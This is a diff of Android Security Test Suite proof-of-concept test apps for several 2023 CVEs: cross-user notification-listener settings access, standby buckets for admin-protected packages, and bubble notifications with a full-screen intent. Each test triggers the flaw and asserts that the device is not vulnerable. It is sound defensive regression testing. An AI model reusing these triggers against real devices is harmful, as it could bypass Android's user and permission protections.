index 0000000..d2f0333
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21107_helper">
+ <application>
+ <service android:name=".TestListener"
+ android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE" />
+ </application>
+</manifest>
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/src/android/security/cts/CVE_2023_21107_helper/TestListener.java
similarity index 70%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/src/android/security/cts/CVE_2023_21107_helper/TestListener.java
index 4416990..860a5ca 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/helper-app/src/android/security/cts/CVE_2023_21107_helper/TestListener.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,9 +14,8 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2023_21107_helper;
-import android.app.Activity;
+import android.service.notification.NotificationListenerService;
-public class PocActivity extends Activity {
-}
+public class TestListener extends NotificationListenerService {}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/AndroidManifest.xml
new file mode 100644
index 0000000..2979d05
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/AndroidManifest.xml
@@ -0,0 +1,22 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21107_test">
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21107_test" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/src/android/security/cts/CVE_2023_21107_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/src/android/security/cts/CVE_2023_21107_test/DeviceTest.java
new file mode 100644
index 0000000..681b4e4
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21107/test-app/src/android/security/cts/CVE_2023_21107_test/DeviceTest.java
@@ -0,0 +1,112 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21107_test;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeNotNull;
+
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.UserInfo;
+import android.os.UserHandle;
+import android.os.UserManager;
+import android.provider.Settings;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.UiDevice;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+ @Test
+ public void testCVE_2023_21107() {
+ UiAutomation uiAutomation = null;
+ try {
+ Instrumentation instrumentation = getInstrumentation();
+ Context context = instrumentation.getContext();
+ uiAutomation = instrumentation.getUiAutomation();
+
+ UserHandle workUserHandle = null;
+ uiAutomation.adoptShellPermissionIdentity(android.Manifest.permission.CREATE_USERS);
+ for (UserInfo info : context.getSystemService(UserManager.class).getUsers()) {
+ if (info.toString().contains("CVE_2023_21107_TestUser")) {
+ workUserHandle = info.getUserHandle();
+ break;
+ }
+ }
+ assumeNotNull(workUserHandle);
+
+ // NotificationAccessDetailsActivity should not launch for another
+ // user id without android.permission.INTERACT_ACROSS_USERS_FULL
+ Intent intent = new Intent(Settings.ACTION_NOTIFICATION_LISTENER_DETAIL_SETTINGS);
+ String helperAppPackage = "android.security.cts.CVE_2023_21107_helper";
+ intent.putExtra(
+ Settings.EXTRA_NOTIFICATION_LISTENER_COMPONENT_NAME,
+ helperAppPackage + "/" + helperAppPackage + ".TestListener");
+ intent.putExtra(Intent.EXTRA_USER_HANDLE, workUserHandle);
+ context.startActivity(intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+ // Test fails if NotificationAccessDetailsActivity is launched
+ assertFalse(
+ "Vulnerable to b/259385017",
+ checkActivityLaunched(UiDevice.getInstance(instrumentation)));
+ } catch (Exception e) {
+ assumeNoException(e);
+ } finally {
+ try {
+ uiAutomation.dropShellPermissionIdentity();
+ } catch (Exception ignored) {
+ // Ignore all exceptiions
+ }
+ }
+ }
+
+ private boolean checkActivityLaunched(final UiDevice device) throws Exception {
+ final Pattern resumedPattern = Pattern.compile("mResumed=(?<value>(true|false))");
+ return poll(
+ () -> {
+ try {
+ String dumpsys =
+ device.executeShellCommand(
+ String.format(
+ "dumpsys activity "
+ + "NotificationAccessDetailsActivity"));
+ Matcher matcher = resumedPattern.matcher(dumpsys);
+ if (matcher.find() && matcher.group("value").equals("true")) {
+ return true;
+ }
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ return false;
+ },
+ 1_000L /* pollingTime */,
+ 5_000L /* maxPollingTime */);
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/res/values/strings.xml
index 2318fa6..1fca492 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/res/values/strings.xml
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/res/values/strings.xml
@@ -16,6 +16,9 @@
-->
<resources>
+ <string name="bucketValueChangeFailMessage">Unable to set standby bucket value!!</string>
<string name="helperAppPackage">android.security.cts.CVE_2023_21128_helper</string>
+ <string name="protectedPackageFailMessage">App not added in admin protected packages list
+ </string>
<string name="testFailMessage">Vulnerable to b/272042183</string>
</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/src/android/security/cts/CVE_2023_21128_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/src/android/security/cts/CVE_2023_21128_test/DeviceTest.java
index 755aaae..c033c7d 100644
--- a/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/src/android/security/cts/CVE_2023_21128_test/DeviceTest.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21128/test-app/src/android/security/cts/CVE_2023_21128_test/DeviceTest.java
@@ -16,13 +16,17 @@
package android.security.cts.CVE_2023_21128_test;
+import static android.app.usage.UsageStatsManager.STANDBY_BUCKET_ACTIVE;
+import static android.app.usage.UsageStatsManager.STANDBY_BUCKET_EXEMPTED;
+import static android.app.usage.UsageStatsManager.STANDBY_BUCKET_NEVER;
+
import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
import static org.junit.Assert.assertFalse;
import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
import android.app.admin.DevicePolicyManager;
-import android.app.usage.UsageStatsManager;
import android.content.ComponentName;
import android.content.Context;
@@ -34,6 +38,7 @@
import org.junit.runner.RunWith;
import java.util.ArrayList;
+import java.util.List;
@RunWith(AndroidJUnit4.class)
public class DeviceTest {
@@ -56,14 +61,26 @@
add(helperAppPackage);
}
});
-
- AmUtils.setStandbyBucket(helperAppPackage, UsageStatsManager.STANDBY_BUCKET_ACTIVE);
+ List<String> packages = dpm.getUserControlDisabledPackages(componentName);
+ assumeTrue(
+ context.getString(R.string.protectedPackageFailMessage),
+ packages.contains(helperAppPackage));
+ AmUtils.setStandbyBucket(helperAppPackage, STANDBY_BUCKET_ACTIVE);
+ final int firstStandbyBucketValue = AmUtils.getStandbyBucket(helperAppPackage);
+ AmUtils.setStandbyBucket(helperAppPackage, STANDBY_BUCKET_NEVER);
+ final int secondStandbyBucketValue = AmUtils.getStandbyBucket(helperAppPackage);
+ boolean passCondition =
+ (firstStandbyBucketValue == STANDBY_BUCKET_EXEMPTED
+ && secondStandbyBucketValue == STANDBY_BUCKET_EXEMPTED);
+ boolean failCondition =
+ (firstStandbyBucketValue == STANDBY_BUCKET_ACTIVE
+ && secondStandbyBucketValue == STANDBY_BUCKET_NEVER);
+ assumeTrue(
+ context.getString(R.string.bucketValueChangeFailMessage),
+ passCondition || failCondition);
// Test fails if the AdminProtected package bucket is not equal STANDBY_BUCKET_EXEMPTED
- assertFalse(
- context.getString(R.string.testFailMessage),
- AmUtils.getStandbyBucket(helperAppPackage)
- != UsageStatsManager.STANDBY_BUCKET_EXEMPTED);
+ assertFalse(context.getString(R.string.testFailMessage), failCondition);
} catch (Exception e) {
assumeNoException(e);
} finally {
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/Android.bp
new file mode 100644
index 0000000..4eee8f7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/Android.bp
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21129",
+ defaults: ["cts_support_defaults"],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ ],
+ sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/AndroidManifest.xml
new file mode 100644
index 0000000..56bea86
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/AndroidManifest.xml
@@ -0,0 +1,37 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21129">
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+ <uses-permission android:name="android.permission.USE_FULL_SCREEN_INTENT" />
+ <application>
+ <activity
+ android:name=".BubbleActivity"
+ android:exported="true">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+ <activity android:name=".PocActivity" />
+ <service android:name=".PocService" />
+ </application>
+ <instrumentation
+ android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21129" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/integers.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/integers.xml
new file mode 100644
index 0000000..50aa41f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/integers.xml
@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+<resources>
+ <integer name="bubbleMetaDataheight">600</integer>
+ <integer name="iconHeight">30</integer>
+ <integer name="iconWidth">30</integer>
+ <integer name="idPocNotification">0</integer>
+ <integer name="requestCode">0</integer>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/strings.xml
new file mode 100644
index 0000000..a4e6c2b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/res/values/strings.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<resources>
+ <string name="bubbleNotificDisabled">Bubble Notifications are disabled on this device</string>
+ <string name="conversationTitle">Conversation Title</string>
+ <string name="idNotificationChannel">notificationChannelId</string>
+ <string name="msgFailure">Device is vulnerable to b/274759612 !!</string>
+ <string name="nameBroadcastActionString">CVE_2023_21129_action</string>
+ <string name="nameNotificationChannel">b/274759612 notification</string>
+ <string name="personMessagingStyle">Me</string>
+ <string name="shortcutId">shortcutId</string>
+ <string name="tagNotify">NOTIFY_TAG</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/BubbleActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/BubbleActivity.java
new file mode 100644
index 0000000..27cd450
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/BubbleActivity.java
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21129;
+
+import android.app.Activity;
+import android.content.Intent;
+
+public class BubbleActivity extends Activity {
+
+ @Override
+ protected void onResume() {
+ try {
+ super.onResume();
+ // Starting PocService as a ForegroundService to post bubbleNotification
+ startForegroundService(new Intent(this, PocService.class));
+ } catch (Exception e) {
+ // ignore any exceptions
+ }
+ }
+
+ @Override
+ protected void onStop() {
+ try {
+ super.onStop();
+ // onStop() has been called successfully, this indicates presence of vulnerability
+ // so broadcasting it to DeviceTest
+ sendBroadcast(new Intent(getString(R.string.nameBroadcastActionString)));
+ } catch (Exception e) {
+ // ignore any exceptions
+ }
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/DeviceTest.java
new file mode 100644
index 0000000..d9dc035
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/DeviceTest.java
@@ -0,0 +1,97 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21129;
+
+import static android.app.NotificationManager.BUBBLE_PREFERENCE_ALL;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.NotificationManager;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+ @Test
+ public void testBubbleNotification() {
+ try {
+ Context context = getInstrumentation().getContext();
+ Semaphore broadcastReceived = new Semaphore(0);
+ final int timeoutMs = 9000;
+
+ // Register a broadcast receiver to receive broadcast from BubbleActivity indicating
+ // presence of vulnerability
+ BroadcastReceiver broadcastReceiver =
+ new BroadcastReceiver() {
+ @Override
+ public void onReceive(Context context, Intent intent) {
+ try {
+ if (intent.getAction()
+ .equals(
+ context.getString(
+ R.string.nameBroadcastActionString))) {
+ broadcastReceived.release();
+ }
+ } catch (Exception ignored) {
+ // ignore any exceptions
+ }
+ }
+ };
+ IntentFilter filter =
+ new IntentFilter(context.getString(R.string.nameBroadcastActionString));
+ context.registerReceiver(broadcastReceiver, filter);
+
+ // Create a notification manager
+ NotificationManager notificationManager =
+ context.getSystemService(NotificationManager.class);
+
+ // Check if bubble notifications are enabled or disabled on the device
+ assumeTrue(
+ context.getString(R.string.bubbleNotificDisabled),
+ notificationManager.getBubblePreference() == BUBBLE_PREFERENCE_ALL);
+
+ // Launching BubbleActivity
+ Intent intent = new Intent(context, BubbleActivity.class);
+ intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK | Intent.FLAG_ACTIVITY_CLEAR_TASK);
+ context.startActivity(intent);
+
+ assertFalse(
+ context.getString(R.string.msgFailure),
+ broadcastReceived.tryAcquire(timeoutMs, TimeUnit.MILLISECONDS));
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocActivity.java
similarity index 79%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocActivity.java
index 4416990..2a92437 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocActivity.java
@@ -1,5 +1,5 @@
/*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
@@ -14,9 +14,10 @@
* limitations under the License.
*/
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2023_21129;
import android.app.Activity;
public class PocActivity extends Activity {
+ // Create an empty activity to detect the vulnerability
}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocService.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocService.java
new file mode 100644
index 0000000..1406e83
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21129/src/android/security/cts/CVE_2023_21129/PocService.java
@@ -0,0 +1,141 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21129;
+
+import static org.junit.Assume.assumeNoException;
+
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.PendingIntent;
+import android.app.Service;
+import android.content.Intent;
+import android.content.pm.ShortcutInfo;
+import android.content.pm.ShortcutManager;
+import android.content.res.Resources;
+import android.graphics.Bitmap;
+import android.graphics.Canvas;
+import android.graphics.Color;
+import android.graphics.drawable.Icon;
+import android.os.IBinder;
+
+public class PocService extends Service {
+ private Resources mResources;
+
+ @Override
+ public int onStartCommand(Intent intent, int flags, int startId) {
+ try {
+ mResources = getResources();
+
+ // Create a bubble intent
+ PendingIntent bubbleIntent =
+ PendingIntent.getActivity(
+ this,
+ mResources.getInteger(R.integer.requestCode),
+ new Intent(this, BubbleActivity.class),
+ PendingIntent.FLAG_MUTABLE /* flags */);
+
+ // Create a pending intent for fullscreen intent
+ PendingIntent pendingIntent =
+ PendingIntent.getActivity(
+ this,
+ mResources.getInteger(R.integer.requestCode),
+ new Intent(this, PocActivity.class),
+ PendingIntent.FLAG_IMMUTABLE /* flags */);
+
+ // Create icon
+ Icon icon = createNotificationIcon();
+
+ // Create a sharing shortcut
+ String shortcutId = getString(R.string.shortcutId);
+ ShortcutInfo shortcut =
+ new ShortcutInfo.Builder(this, shortcutId)
+ .setIcon(icon)
+ .setIntent(new Intent(Intent.ACTION_MAIN))
+ .setLongLived(true)
+ .setShortLabel(shortcutId)
+ .build();
+
+ // Create a shortcutManager
+ ShortcutManager shortcutManager = getSystemService(ShortcutManager.class);
+
+ // Push the shortcut created above to shortcutManager
+ shortcutManager.pushDynamicShortcut(shortcut);
+
+ // Create a notification channel
+ NotificationChannel notificationChannel =
+ new NotificationChannel(
+ getString(R.string.idNotificationChannel),
+ getString(R.string.nameNotificationChannel),
+ NotificationManager.IMPORTANCE_HIGH);
+ notificationChannel.setDescription(getString(R.string.nameNotificationChannel));
+
+ // Create a notificationManager
+ NotificationManager notificationManager = getSystemService(NotificationManager.class);
+ notificationManager.createNotificationChannel(notificationChannel);
+
+ // Create a bubble metadata.
+ Notification.BubbleMetadata bubbleData =
+ new Notification.BubbleMetadata.Builder()
+ .setDesiredHeight(mResources.getInteger(R.integer.bubbleMetaDataheight))
+ .setIntent(bubbleIntent)
+ .setAutoExpandBubble(true)
+ .setSuppressNotification(true)
+ .setIcon(icon)
+ .build();
+
+ // Set messagingStyle so that conversations is set for notification
+ Notification.MessagingStyle messagingStyle =
+ new Notification.MessagingStyle(getString(R.string.personMessagingStyle))
+ .setConversationTitle(getString(R.string.conversationTitle));
+
+ // Create a notification, referencing the sharing shortcut.
+ Notification.Builder pocNotification =
+ new Notification.Builder(this, getString(R.string.idNotificationChannel))
+ .setContentIntent(bubbleIntent)
+ .setSmallIcon(icon)
+ .setShortcutId(shortcutId)
+ .setBubbleMetadata(bubbleData)
+ .setFullScreenIntent(pendingIntent, true /* high priority */)
+ .setStyle(messagingStyle);
+
+ notificationManager.notify(
+ getString(R.string.tagNotify),
+ mResources.getInteger(R.integer.idPocNotification),
+ pocNotification.build());
+ } catch (Exception e) {
+ assumeNoException(e);
+ }
+ return super.onStartCommand(intent, flags, startId);
+ }
+
+ Icon createNotificationIcon() throws Exception {
+ Bitmap testBitmap =
+ Bitmap.createBitmap(
+ getResources().getInteger(R.integer.iconWidth),
+ getResources().getInteger(R.integer.iconHeight),
+ Bitmap.Config.ARGB_8888);
+ final Canvas canvas = new Canvas(testBitmap);
+ canvas.drawColor(Color.BLUE);
+ return Icon.createWithBitmap(testBitmap);
+ }
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return null;
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/Android.bp
new file mode 100644
index 0000000..a1132bb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CVE-2023-21144",
+ defaults: [
+ "cts_defaults",
+ ],
+ srcs: [
+ "src/**/*.java",
+ ],
+ test_suites: [
+ "sts",
+ ],
+ static_libs: [
+ "androidx.test.core",
+ "androidx.test.rules",
+ "androidx.test.uiautomator_uiautomator",
+ ],
+ platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/AndroidManifest.xml
new file mode 100644
index 0000000..c0b27b7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/AndroidManifest.xml
@@ -0,0 +1,38 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.security.cts.CVE_2023_21144">
+
+ <uses-permission android:name="android.permission.EXPAND_STATUS_BAR" />
+ <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+ <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+
+ <application>
+ <service android:name=".PocListenerService"
+ android:exported="true"
+ android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
+ <intent-filter>
+ <action android:name="android.service.notification.NotificationListenerService" />
+ </intent-filter>
+ </service>
+ </application>
+
+ <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+ android:targetPackage="android.security.cts.CVE_2023_21144" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/res/values/strings.xml
new file mode 100644
index 0000000..d51c9b9
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21144/res/values/strings.xml
@@ -0,0 +1,32 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ Copyright 2023 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
